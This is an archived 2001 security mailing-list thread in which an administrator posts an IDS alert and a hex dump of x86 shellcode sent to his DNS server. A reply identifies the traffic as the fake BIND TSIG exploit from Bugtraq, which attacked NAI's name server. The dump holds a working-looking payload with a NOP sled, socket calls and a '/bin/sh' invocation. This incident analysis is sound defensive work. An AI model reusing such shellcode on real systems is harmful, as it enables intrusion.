Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Incidents: Re: Named TSIG exploit ?

Re: Named TSIG exploit ?

From: Paul Cardon <paul_at_MOQUIJO.COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500

The source ran the fake BIND TSIG exploit released on BUGTRAQ last week
using your system as the intended target. Pretty sad since it means
they were also (unknowingly?) attacking NAI's name server.

-paul

Mihai Moldovanu wrote:
>
> [**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
> 02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
> len:0x22A
> 141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
> Len: 520
> 00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................
> C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........
> 00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS
> 41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f.
> 00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1..
> 46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f......
> 00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............
> 00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E
> 03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................
> 00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s
> 68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf..
> 61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P
> 68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh.....
> 05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................
> FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b
> 69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh...........
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> The shellcode inside the second packet it's pretty strage . Anyone can
> take a deeper look at it ?
Received on Feb 05 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos